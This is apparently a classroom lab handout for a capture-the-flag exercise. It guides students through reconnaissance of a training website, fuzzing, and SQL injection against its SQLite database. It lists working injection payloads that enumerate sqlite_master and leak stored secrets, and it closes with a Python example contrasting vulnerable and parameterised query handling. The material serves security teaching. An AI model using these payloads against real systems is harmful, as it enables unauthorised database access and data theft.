Notes and Lab

Your task: Evil Company Co.

Psst... Agent 142, now that you're an employee of Evil Company Co., try to exfiltrate some secrets off their website. http://live.petcs.codes/ Can you find the secret code they assigned to your user?

1. Reconnaissance

Look for where vulnerabilities may occur, especially:

  1. User interface (UI) forms and fields
  2. HTTP headers and cookies
  3. APIs
  4. Files/Other local storage
  5. Databases
  6. Email or other kinds of messages

Once we've identified the possible vulnerable locations, we'll attempt to identify which vulnerabilities we can carry out against each of them.

Can you make a list of all vulnerable locations?

Instructions:

  1. Visit the website.
  2. Take note of these 3 pages presented in the menu. Which of the following pages might be vulnerable?
    • Home /
    • Login /login
    • Sign Up /signup
  3. Visit the "Sign Up" page. Right click anywhere and bring up "Inspect Element". Visit the "Network" tab and ensure "Preserve log" is checked. Locate the "Clear" button and click it.
  4. Create an account, but before clicking "Sign Up", inspect the Network activity (do you know how to use the Chrome Inspector?). What is happening when you create an account?
    • Can you find the HTTP POST request?
    • Where is it sending to (aka Request URL)?
    • What is the response code?
    • What data is being sent (aka Form Data)?
  5. Now log in. Clear your Network data right before clicking "Login". Again, what is happening when you log in?
    • Can you find the HTTP POST request?
    • Where is it sending to (aka Request URL)?
    • What is the response code?
    • What data is being sent (aka Form Data)?
  6. Look at the menu. Did it change? Which of the following pages might be vulnerable?
    • Profile /profile
    • Todo /todo
    • Logout /logout
  7. Create a TODO item. What is happening when you add a new TODO item? Clear your Network data right before adding a new item.
    • Can you find the HTTP POST request?
    • Where is it sending to (aka Request URL)?
    • What is the response code?
    • What data is being sent (aka Form Data)?
  8. Play around and explore further. Take note of any strange behaviour.

I now know what is being sent to and received from the server.

2. Engage

Instructions:

  1. Visit here to build your fuzzer! When you're done, come back.
  2. Run the fuzzer once. What do you notice?
    • Which values caused an error?
    • Which values were marked suspicious?
    • What does a 500 Response Code error mean? (Use Google)
    • Analyse and interpret your results. What can you infer from these results? Is the server vulnerable to SQLi?
  3. Now build your payload!

3. Exploit

If your account becomes slow/laggy, create a new one!

Don't worry, we will take this up together!

Some tips:

Through fuzzing, we now know that an odd number of quotes will crash the server and an even number of quotes will result in suspicious responses.

  1. Try a' || 'b What do you see?
  2. Try '||(SELECT 1+1)||' What is so dangerous about SELECT statements?
  3. Try '||(SELECT sqlite_version())||' What version of SQLite is this server running?
  4. Try '||(SELECT name FROM sqlite_master LIMIT 1 OFFSET 0)||' What is the name of the table at OFFSET 0? What other tables are present on the server? What if you change the OFFSET to 1? To 2?
  5. Try '||(SELECT sql FROM sqlite_master LIMIT 1 OFFSET 0)||' What columns are present on this table? Do you see the name of this table? Try changing the OFFSET! Are there any other tables present?
  6. Try '||(SELECT id FROM name_of_table)||' (Replace name_of_table with the name you wrote down from the previous steps). Can you leak the secret now?
  7. Challenge (for a prize!): What other secrets are hidden on this server?
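To see why the quote-concatenation payloads in the tips above behave the way they do, and what closes the hole, here is an added example (not the lab server's code; the todos table and the shape of the /todo handler are assumptions) that runs each submitted value through a handler that splices input into SQL and through one that binds it as a parameter, on an in-memory SQLite database:

```python
import sqlite3

# Constructed stand-in for the lab's database; the real server's schema is
# unknown, so the 'todos' table is an assumption.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE todos (id INTEGER PRIMARY KEY, item TEXT)")
    return con

def last_item(con):
    row = con.execute("SELECT item FROM todos ORDER BY id DESC LIMIT 1").fetchone()
    return row[0]

def handle_vulnerable(con, item):
    """Mimics a /todo handler that concatenates the form field into the SQL.
    Returns (status_code, stored_item) the way the fuzzer sees the response."""
    sql = "INSERT INTO todos (item) VALUES ('" + item + "')"
    try:
        con.execute(sql)
    except sqlite3.Error:
        # An unbalanced quote leaves the statement malformed: this is the
        # 500 response seen when fuzzing with an odd number of quotes.
        return 500, None
    # An even number of quotes keeps the statement valid, so whatever SQL
    # sits between them is evaluated and its result is stored.
    return 200, last_item(con)

def handle_safe(con, item):
    """Same handler with a bound parameter: the input is data, never SQL."""
    con.execute("INSERT INTO todos (item) VALUES (?)", (item,))
    return 200, last_item(con)

def compare(item):
    """Run one submitted value through both handlers on fresh databases."""
    return handle_vulnerable(make_db(), item), handle_safe(make_db(), item)

if __name__ == "__main__":
    for payload in ["plain text", "a'", "a' || 'b",
                    "'||(SELECT sqlite_version())||'"]:
        print(repr(payload), "->", compare(payload))
```

The parameterised handler stores every payload verbatim, including the SELECT ones, which is the detection signal to look for in your own results: a field that comes back holding computed values rather than what was typed is being evaluated as SQL.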